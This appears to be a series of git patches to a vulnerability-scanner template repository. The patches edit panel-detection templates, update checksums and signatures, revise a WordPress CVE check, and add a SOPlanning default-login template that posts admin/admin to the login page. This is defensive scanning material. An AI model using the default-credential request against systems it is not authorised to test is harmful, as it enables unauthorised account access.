490a004630440220078dae8c97372b931bd7435693b67c204a81c9411fcbe20e1fc657d63704bdff02200cc52e3711d11352ce0f241c9cc79a6371d05c0070ec19166837dfcea4382ead:922c64590222798bb761d5b6d8e72950 From f4a325ebb39f75a3d26e66f4ca4b12638b8dc260 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 7 May 2024 17:43:01 +0530 Subject: [PATCH 0645/1768] Update rdweb-panel.yaml --- http/exposed-panels/rdweb-panel.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/exposed-panels/rdweb-panel.yaml b/http/exposed-panels/rdweb-panel.yaml index 828870f3d7..d4b79b27c2 100644 --- a/http/exposed-panels/rdweb-panel.yaml +++ b/http/exposed-panels/rdweb-panel.yaml @@ -1,7 +1,7 @@ id: rdweb-panel info: - name: RD Web Access - Panel Detect + name: RD Web Access Panel - Detect author: rxerium,sorrowx3 severity: info description: | @@ -11,12 +11,12 @@ info: classification: cpe: cpe:2.3:a:microsoft:remote_desktop:*:*:*:*:android:*:*:* metadata: + verified: true max-request: 1 product: remote_desktop - shodan-query: html:"RD Web Access" vendor: microsoft - verified: true - tags: panel,login,rdp,web-access,microsoft + shodan-query: html:"RD Web Access" + tags: panel,login,rdp,web-access,Microsoft,detect http: - method: GET From 3ce8385040c40d2356e24863a480c503b2cc1d6f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 7 May 2024 12:13:34 +0000 Subject: [PATCH 0647/1768] Auto Generated Templates Checksum [Tue May 7 12:13:34 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7dc6d01c57..b797f836d5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -855,7 +855,7 @@ http/cnvd/2020/CNVD-2020-63964.yaml:e340531566025fec2a69c5b211366d34aabebdbf http/cnvd/2020/CNVD-2020-67113.yaml:b6ed5ca5c479927c2d267a6beb708bdc782c1b8a http/cnvd/2020/CNVD-2020-68596.yaml:4a1c644954b7d789b503a390644acfc1c459e1dc http/cnvd/2021/CNVD-2021-01931.yaml:16f6c167f58030d3042772280faea486e8e19a7d -http/cnvd/2021/CNVD-2021-09650.yaml:12a182006ce1865f773aebdc5d467e51437cb441 +http/cnvd/2021/CNVD-2021-09650.yaml:c52190bcf210a731366792c944c5bfe8272296a8 http/cnvd/2021/CNVD-2021-10543.yaml:c1026547067fb7f3dd5601f3f71eec8793222778 http/cnvd/2021/CNVD-2021-14536.yaml:78b9c1a700aedb16c09fb174f3a2b87361e4d757 http/cnvd/2021/CNVD-2021-15822.yaml:2d07bfd7e2578a3cb23bf8d3efb74adf85abd035 @@ -5117,6 +5117,7 @@ http/miscellaneous/apple-app-site-association.yaml:0c900bfd50a6f29041445996ed33a http/miscellaneous/aws-ecs-container-agent-tasks.yaml:8d29db7a82337344e379b72bce008157bd4df961 http/miscellaneous/balada-injector-malware.yaml:46e26d3735f737c251df9a46d7091f3d9e5c7e55 http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0 +http/miscellaneous/cloudflare-rocketloader-htmli.yaml:06dee1d323f4c7da641823715bd9347a0ad4872e http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387 http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5 http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e @@ -5235,7 +5236,6 @@ http/misconfiguration/clickhouse-unauth-api.yaml:50981e20ce91e8483c828bc8dc08342 http/misconfiguration/clockwork-dashboard-exposure.yaml:560363ab2aa0f4ee66a559fcd79af2a25a1ec3f3 http/misconfiguration/cloud-metadata.yaml:c830abb35eeddf51f760f450947c00499fcdae28 http/misconfiguration/cloudflare-image-ssrf.yaml:571629f99a2171f68d0e62923df20f125663bb22 -http/misconfiguration/cloudflare-rocketloader-htmli.yaml:5d025c481a102118f4ab9e7a2d834520c6714f82 http/misconfiguration/cluster-panel.yaml:a55bbcd24bdcbf255c289f5e865ef63a0b00f6ec http/misconfiguration/cobbler-exposed-directory.yaml:024dc111a55d35d7da4e00e12c15ebb9e28c8303 http/misconfiguration/codeigniter-errorpage.yaml:85190ddc7995b4e5a3889743d784c9ff750fa987 @@ -8481,7 +8481,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1841b08f8a6dd51fe14fbd904321e3b714c72eb8 +templates-checksum.txt:f1ad108368e69e692d755166d35c7811023f103f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1aae2fcbf4f51f2b1fda12c2107c858ee504c60d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 7 May 2024 12:15:18 +0000 Subject: [PATCH 0648/1768] Auto Template Signing [Tue May 7 12:15:18 UTC 2024] :robot: --- http/miscellaneous/cloudflare-rocketloader-htmli.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/miscellaneous/cloudflare-rocketloader-htmli.yaml b/http/miscellaneous/cloudflare-rocketloader-htmli.yaml index 6f02f699ed..df7dba47b2 100644 --- a/http/miscellaneous/cloudflare-rocketloader-htmli.yaml +++ b/http/miscellaneous/cloudflare-rocketloader-htmli.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220078dae8c97372b931bd7435693b67c204a81c9411fcbe20e1fc657d63704bdff02200cc52e3711d11352ce0f241c9cc79a6371d05c0070ec19166837dfcea4382ead:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204d31387c924b19c1fe6ea3ac22a8c991cac1bee85fff7482d398b5817711313b022100f6125416aaf2f9132f5aac7ac183e6f855f343124e33e429d10bb07af5553fdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3880ae6f68f42d0e4c5c2742f17264c8dbbdb955 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 7 May 2024 12:20:14 +0000 Subject: [PATCH 0650/1768] Auto Generated Templates Checksum [Tue May 7 12:20:14 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b797f836d5..56c338aa0d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4234,7 +4234,7 @@ http/exposed-panels/rancher-dashboard.yaml:f5b76b896b81d6515e59109cb0feb9e8bcc41 http/exposed-panels/rancher-panel.yaml:9f8e5792e4c50bd25d78d974f3c72a7b4c2cc810 http/exposed-panels/raspberrymatic-panel.yaml:c5092f2f1d95cf09589e5326cc291b0631391693 http/exposed-panels/rcdevs-webadm-panel.yaml:b154e2a68d185946223ae098853f1139d36d9c22 -http/exposed-panels/rdweb-panel.yaml:ea3373249cad29938b76c9a9e0d15550a918f495 +http/exposed-panels/rdweb-panel.yaml:9da8f07a0b50bccbd19d5cf062fe0e22a76da88d http/exposed-panels/red-lion-panel.yaml:3069a7ec2e960c21c7ebef0e163dfe412ab1688b http/exposed-panels/redash-panel.yaml:b38d3605aea7c194af88114d3333bba9ba3b4f3d http/exposed-panels/redhat/redhat-satellite-panel.yaml:d22be30acc97a640bb0d4469faeec5b57e6602c9 @@ -5117,7 +5117,7 @@ http/miscellaneous/apple-app-site-association.yaml:0c900bfd50a6f29041445996ed33a http/miscellaneous/aws-ecs-container-agent-tasks.yaml:8d29db7a82337344e379b72bce008157bd4df961 http/miscellaneous/balada-injector-malware.yaml:46e26d3735f737c251df9a46d7091f3d9e5c7e55 http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0 -http/miscellaneous/cloudflare-rocketloader-htmli.yaml:06dee1d323f4c7da641823715bd9347a0ad4872e +http/miscellaneous/cloudflare-rocketloader-htmli.yaml:b590d6e588eeb9411fbfc27c87fcf6b695ee63f5 http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387 http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5 http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e @@ -8481,7 +8481,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f1ad108368e69e692d755166d35c7811023f103f +templates-checksum.txt:59303fd926c8970d9db601f1f3195cf517c7571b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4f2223c56b3dc85540bd67bf128e501ff49e72ca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 7 May 2024 12:21:55 +0000 Subject: [PATCH 0651/1768] Auto Template Signing [Tue May 7 12:21:55 UTC 2024] :robot: --- http/exposed-panels/rdweb-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/rdweb-panel.yaml b/http/exposed-panels/rdweb-panel.yaml index d4b79b27c2..53fa80a3be 100644 --- a/http/exposed-panels/rdweb-panel.yaml +++ b/http/exposed-panels/rdweb-panel.yaml @@ -39,3 +39,4 @@ http: - "" - "Microsoft Remote Desktop" condition: and +# digest: 4b0a00483046022100d8d5f14d81fae08877f82099f30744869551a6a2f479d508120a516ab6fb8335022100ff88220b9a98dfb6d2d2a80179efe81c1900430b2e67740c681830d8e98843bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 468a07868a2096dbea719a9405a35c438d3474b6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 7 May 2024 12:22:55 +0000 Subject: [PATCH 0653/1768] Auto Generated Templates Checksum [Tue May 7 12:22:55 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 56c338aa0d..bfb3d309e1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4234,7 +4234,7 @@ http/exposed-panels/rancher-dashboard.yaml:f5b76b896b81d6515e59109cb0feb9e8bcc41 http/exposed-panels/rancher-panel.yaml:9f8e5792e4c50bd25d78d974f3c72a7b4c2cc810 http/exposed-panels/raspberrymatic-panel.yaml:c5092f2f1d95cf09589e5326cc291b0631391693 http/exposed-panels/rcdevs-webadm-panel.yaml:b154e2a68d185946223ae098853f1139d36d9c22 -http/exposed-panels/rdweb-panel.yaml:9da8f07a0b50bccbd19d5cf062fe0e22a76da88d +http/exposed-panels/rdweb-panel.yaml:ae93f0fd0ec1a86e1272ef68d2e687641a70e945 http/exposed-panels/red-lion-panel.yaml:3069a7ec2e960c21c7ebef0e163dfe412ab1688b http/exposed-panels/redash-panel.yaml:b38d3605aea7c194af88114d3333bba9ba3b4f3d http/exposed-panels/redhat/redhat-satellite-panel.yaml:d22be30acc97a640bb0d4469faeec5b57e6602c9 @@ -6514,7 +6514,7 @@ http/takeovers/softr-takeover.yaml:a47cd0392585f45846dbbb70a05574cc564e18e6 http/takeovers/sprintful-takeover.yaml:b9b552223b69e1b9086b442307c22de6f8bfa864 http/takeovers/squadcast-takeover.yaml:779b3c54dab067369ffa422d108a2de9b81a87b2 http/takeovers/strikingly-takeover.yaml:9aa7d5d97af3a23c2eddf1035ba17eea747db30f -http/takeovers/surge-takeover.yaml:c3c45bfbe18ad235a9a5a999c73172baf77cdb1f +http/takeovers/surge-takeover.yaml:7411ec49245afcee07d362807912dfb75bd49e2e http/takeovers/surveygizmo-takeover.yaml:9f2b0bb8599c05d03d37ce48e1b7ae2bdc92c523 http/takeovers/surveysparrow-takeover.yaml:1e8b06deab5ec653168e595223f3eb83bb043796 http/takeovers/tave-takeover.yaml:36d44f071b52aad95c3496fd4afeb0c50effd4c2 @@ -8481,7 +8481,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:59303fd926c8970d9db601f1f3195cf517c7571b +templates-checksum.txt:29be5b17357324ef8f36bc256c1915ab7664f544 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ca5cd4e814fc1e2113d7537082b99adcf2210235 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 7 May 2024 15:24:16 +0300 Subject: [PATCH 0654/1768] add soplanning default login --- .../others/soplanning-default-login.yaml | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/default-logins/others/soplanning-default-login.yaml diff --git a/http/default-logins/others/soplanning-default-login.yaml b/http/default-logins/others/soplanning-default-login.yaml new file mode 100644 index 0000000000..e607e99264 --- /dev/null +++ b/http/default-logins/others/soplanning-default-login.yaml @@ -0,0 +1,44 @@ +id: SOPlanning-default-login + +info: + name: SOPlanning Online Planning tool defualt login + author: Kazgangap + severity: info + description: | + SOPlanning contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://www.soplanning.org/en/ + metadata: + vendor: soplanning + product: soplanning + shodan-query: html:"soplanning" + tags: soplanning,default-login + +http: + - raw: + - | + POST /process/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + login={{username}}&password={{password}} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + redirects: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'title="Logout"' + - 'title="Modify my profile"' + - 'Settings' + condition: and \ No newline at end of file From 41f73de8ea44fd337771860441f94172d4f8474d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 7 May 2024 12:24:28 +0000 Subject: [PATCH 0655/1768] Auto Template Signing [Tue May 7 12:24:28 UTC 2024] :robot: --- http/takeovers/surge-takeover.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/takeovers/surge-takeover.yaml b/http/takeovers/surge-takeover.yaml index abafbacdff..012e8683e7 100644 --- a/http/takeovers/surge-takeover.yaml +++ b/http/takeovers/surge-takeover.yaml @@ -29,5 +29,4 @@ http: - type: status status: - 404 - -# digest: 490a00463044022064c4ab13768f1a4fa885670b9020a4c8ac4cc28f650d65e7b146c52d1ccbd6fe02201650ae50cfbcbbf6790afdd7de6a939cb12ca3348c31167ade8a032969493f04:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008687ea9c91087816fda6cde6f2654de22d64f00f4452d3c150919a3d02c09d80022010aceb815c267cd65a6a2d4a9e2632b00ab2724596e2edaa4f816b872406f809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8a91808338fc8aed0f451f253050d075cff3d7e9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 7 May 2024 17:59:13 +0530 Subject: [PATCH 0656/1768] updated matchers & info --- http/cves/2024/CVE-2024-0881.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-0881.yaml b/http/cves/2024/CVE-2024-0881.yaml index 39883f436c..fdd0a288bd 100644 --- a/http/cves/2024/CVE-2024-0881.yaml +++ b/http/cves/2024/CVE-2024-0881.yaml @@ -1,23 +1,26 @@ id: CVE-2024-0881 info: - name: Combo Blocks < 2.2.76 - Password Protected Posts Access + name: Combo Blocks < 2.2.76 - Improper Access Control author: Kazgangap severity: medium description: | The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-0881 - https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/ - https://github.com/fkie-cad/nvd-json-data-feeds + - https://nvd.nist.gov/vuln/detail/CVE-2024-0881 classification: + cve-id: CVE-2024-0881 + cwe-id: CWE-284 epss-score: 0.00043 epss-percentile: 0.08268 metadata: verified: true - max-request: 1 + max-request: 3 publicwww-query: "/wp-content/plugins/user-meta/" - tags: cve,cve2023,wpscan,wordpress,wp-plugin,unauth + tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure + flow: http(1) && http(2) http: @@ -41,7 +44,7 @@ http: matchers: - type: word words: - - '"html"' + - '{"html"' - '"
Date: Tue, 7 May 2024 18:25:10 +0530 Subject: [PATCH 0657/1768] passive tag added --- http/cves/2024/CVE-2024-32651.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-32651.yaml b/http/cves/2024/CVE-2024-32651.yaml index 4dbfdfba28..323e23e5b7 100644 --- a/http/cves/2024/CVE-2024-32651.yaml +++ b/http/cves/2024/CVE-2024-32651.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 shodan-query: html:"Change Detection" - tags: cve,cve2024,changedetection,ssti,rce + tags: cve,cve2024,changedetection,ssti,rce,passive http: - method: GET From 70e83cd834a2ca54200d9aa35a41d974298b36f2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 May 2024 18:27:45 +0530 Subject: [PATCH 0658/1768] Update and rename soplanning-default-login.yaml to soplanning-default-login.yaml --- .../soplanning-default-login.yaml | 23 +++++++++++-------- 1 file changed, 13 insertions(+), 10 deletions(-) rename http/default-logins/{others => soplanning}/soplanning-default-login.yaml (86%) diff --git a/http/default-logins/others/soplanning-default-login.yaml b/http/default-logins/soplanning/soplanning-default-login.yaml similarity index 86% rename from http/default-logins/others/soplanning-default-login.yaml rename to http/default-logins/soplanning/soplanning-default-login.yaml index e607e99264..a1387595a4 100644 --- a/http/default-logins/others/soplanning-default-login.yaml +++ b/http/default-logins/soplanning/soplanning-default-login.yaml @@ -1,9 +1,9 @@ -id: SOPlanning-default-login +id: soplanning-default-login info: - name: SOPlanning Online Planning tool defualt login + name: SOPlanning - Default Login author: Kazgangap - severity: info + severity: high description: | SOPlanning contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: @@ -12,6 +12,8 @@ info: vendor: soplanning product: soplanning shodan-query: html:"soplanning" + verified: true + max-request: 1 tags: soplanning,default-login http: @@ -20,25 +22,26 @@ http: POST /process/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - + login={{username}}&password={{password}} - + attack: pitchfork payloads: username: - admin password: - admin - + redirects: true matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - 'title="Logout"' - 'title="Modify my profile"' - 'Settings' - condition: and \ No newline at end of file + condition: and + + - type: status + status: + - 200 From 7766f3f4c8f62667e2494b4c6d93b4f5a8b83846 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 7 May 2024 18:39:44 +0530 Subject: [PATCH 0659/1768] Update teamforge-detect.yaml --- http/technologies/teamforge-detect.yaml | 19 ++++++------------- 1 file changed, 6 insertions(+), 13 deletions(-) diff --git a/http/technologies/teamforge-detect.yaml b/http/technologies/teamforge-detect.yaml index f7f4d7a8fe..91c2c9a0cf 100644 --- a/http/technologies/teamforge-detect.yaml +++ b/http/technologies/teamforge-detect.yaml @@ -9,21 +9,16 @@ info: reference: - https://digital.ai/products/teamforge/ metadata: - # TeamForge changes the title based on lange, for example: - # TeamForge : 欢迎 - # TeamForge : Welcome shodan-query: title:"TeamForge :" fofa-query: title="TeamForge :" - tags: - - tech - - teamforge + tags: tech,teamforge http: - method: GET path: - "{{BaseURL}}" + redirects: true - max-redirects: 5 # base url always follows a redirect chain, normally it's 3, but can be more matchers-condition: and matchers: - type: word @@ -31,17 +26,15 @@ http: words: - "TeamForge :" - "Log In to TeamForge" - - 'href="http://www.collab.net/products/teamforge/" target="_blank">TeamForge' - condition: or + condition: and + - type: status status: - 200 + extractors: - type: regex + name: version part: body regex: - # the version is included in a help page link, for example - # version teamforge810 is teamforge version 8.1 and teamforge1711 - # is teamforge version 17.11 - "teamforge(\\d+)" - name: version From c2acefc117df7f80910fab1abd4b1c49accc08c8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 7 May 2024 18:40:53 +0530 Subject: [PATCH 0660/1768] Update and rename umami-detect.yaml to umami-panel.yaml --- .../umami-detect.yaml => exposed-panels/umami-panel.yaml} | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename http/{technologies/umami-detect.yaml => exposed-panels/umami-panel.yaml} (84%) diff --git a/http/technologies/umami-detect.yaml b/http/exposed-panels/umami-panel.yaml similarity index 84% rename from http/technologies/umami-detect.yaml rename to http/exposed-panels/umami-panel.yaml index ce2a42af6e..f0b4df8995 100644 --- a/http/technologies/umami-detect.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -1,13 +1,14 @@ -id: umami-detect +id: umami-panel info: - name: Umami Detect + name: Umami Panel author: userdehghani severity: info metadata: max-request: 1 shodan-query: http.title:"umami" - tags: tech,umami,analytics + verified: true + tags: panel,umami,login http: - method: GET From 3a021ebf0b68a450d117afff353689575035e774 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 7 May 2024 18:43:27 +0530 Subject: [PATCH 0661/1768] matcher and metadata update --- http/exposed-panels/umami-panel.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index f0b4df8995..e20ed8e61d 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - shodan-query: http.title:"umami" + shodan-query: http.favicon.hash:-130447705 verified: true tags: panel,umami,login @@ -20,9 +20,7 @@ http: - type: word part: body words: - - '<title>umami - login' - - '

umami

' - condition: and + - 'Login | umami' - type: status status: From 8e112cd5dc8e3b48788555e6074cfe7da8ab81b5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 May 2024 18:47:55 +0530 Subject: [PATCH 0662/1768] minor update --- http/exposures/configs/ms-exchange-local-domain.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/http/exposures/configs/ms-exchange-local-domain.yaml b/http/exposures/configs/ms-exchange-local-domain.yaml index 8d1bc95f8a..7480a96b15 100644 --- a/http/exposures/configs/ms-exchange-local-domain.yaml +++ b/http/exposures/configs/ms-exchange-local-domain.yaml @@ -1,14 +1,14 @@ id: ms-exchange-local-domain info: - name: Microsoft Exchange Autodiscover - Local Domain + name: Microsoft Exchange Autodiscover - Local Domain Exposure author: userdehghani - severity: Medium + severity: medium + description: | + Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cwe-id: CWE-200 - description: | - Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint. reference: - https://support.microsoft.com/en-gb/topic/autodiscover-v2-returns-internalurl-not-externalurls-in-other-site-774301e2-2d1e-d5e0-aa41-a49f6e9b06f4 metadata: @@ -22,7 +22,6 @@ http: path: - "{{BaseURL}}/autodiscover/autodiscover.json?Protocol=ActiveSync&Email=user@domain.tld&RedirectCount=1" - stop-at-first-match: true matchers-condition: and matchers: - type: regex From 3a73e2dd5e0c58aa7ded380729d8f66d38509028 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 7 May 2024 13:20:55 +0000 Subject: [PATCH 0663/1768] Auto Generated Templates Checksum [Tue May 7 13:20:55 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bfb3d309e1..8998bb8926 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3230,6 +3230,7 @@ http/cves/2024/CVE-2024-0305.yaml:f9c1488139a1e3dbd686ae698b0761ff93ec0dd8 http/cves/2024/CVE-2024-0337.yaml:a0259282bfc67ee1b2339ea3af3bd295baa59cc3 http/cves/2024/CVE-2024-0352.yaml:e324d6ccb69d2bee50aa487f5e068cc005c715d8 http/cves/2024/CVE-2024-0713.yaml:391fe60dbb13edaff0fb693b1b25fb71dcfb0241 +http/cves/2024/CVE-2024-0881.yaml:ad9b336aa816f3dafb631bf587de31347e6b60d6 http/cves/2024/CVE-2024-1021.yaml:a48c4dce997dffd7ee3b988bc0dc646f2cf840d7 http/cves/2024/CVE-2024-1061.yaml:86d3c132707db27f265ffc55e9a5897dd6b03fd0 http/cves/2024/CVE-2024-1071.yaml:f9280444cf13a8677b365b28c1bf7cd991829d9c @@ -6514,7 +6515,7 @@ http/takeovers/softr-takeover.yaml:a47cd0392585f45846dbbb70a05574cc564e18e6 http/takeovers/sprintful-takeover.yaml:b9b552223b69e1b9086b442307c22de6f8bfa864 http/takeovers/squadcast-takeover.yaml:779b3c54dab067369ffa422d108a2de9b81a87b2 http/takeovers/strikingly-takeover.yaml:9aa7d5d97af3a23c2eddf1035ba17eea747db30f -http/takeovers/surge-takeover.yaml:7411ec49245afcee07d362807912dfb75bd49e2e +http/takeovers/surge-takeover.yaml:0f7c8583cebc4244dd217376b270cdce848441d4 http/takeovers/surveygizmo-takeover.yaml:9f2b0bb8599c05d03d37ce48e1b7ae2bdc92c523 http/takeovers/surveysparrow-takeover.yaml:1e8b06deab5ec653168e595223f3eb83bb043796 http/takeovers/tave-takeover.yaml:36d44f071b52aad95c3496fd4afeb0c50effd4c2 @@ -8481,7 +8482,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:29be5b17357324ef8f36bc256c1915ab7664f544 +templates-checksum.txt:dce7b05f3958d9a6f2a0dcf95d46642fa302d498 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0d5eb328bfbaeb56b1aedb3141cb98a4d4f9d247 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 May 2024 18:52:34 +0530 Subject: [PATCH 0664/1768] Update and rename teamforge-detect.yaml to teamforge-panel.yaml --- .../teamforge-panel.yaml} | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) rename http/{technologies/teamforge-detect.yaml => exposed-panels/teamforge-panel.yaml} (83%) diff --git a/http/technologies/teamforge-detect.yaml b/http/exposed-panels/teamforge-panel.yaml similarity index 83% rename from http/technologies/teamforge-detect.yaml rename to http/exposed-panels/teamforge-panel.yaml index 91c2c9a0cf..d336250958 100644 --- a/http/technologies/teamforge-detect.yaml +++ b/http/exposed-panels/teamforge-panel.yaml @@ -1,17 +1,19 @@ -id: teamforge-detect +id: teamforge-panel info: name: TeamForge - Detection author: lstatro severity: info description: | - Detects if the target is running a TeamForge server from digital.ai. + TeamForge Login Panel was discovered. reference: - https://digital.ai/products/teamforge/ metadata: shodan-query: title:"TeamForge :" fofa-query: title="TeamForge :" - tags: tech,teamforge + verified: true + max-request: 1 + tags: panel,teamforge,login http: - method: GET From 4c175bbbc1f666cb11cecaf9fa1056cb74d9fc31 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 7 May 2024 13:22:37 +0000 Subject: [PATCH 0665/1768] Auto Template Signing [Tue May 7 13:22:37 UTC 2024] :robot: --- http/cves/2024/CVE-2024-0881.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-0881.yaml b/http/cves/2024/CVE-2024-0881.yaml index fdd0a288bd..b88c039afa 100644 --- a/http/cves/2024/CVE-2024-0881.yaml +++ b/http/cves/2024/CVE-2024-0881.yaml @@ -52,3 +52,4 @@ http: - type: status status: - 200 +# digest: 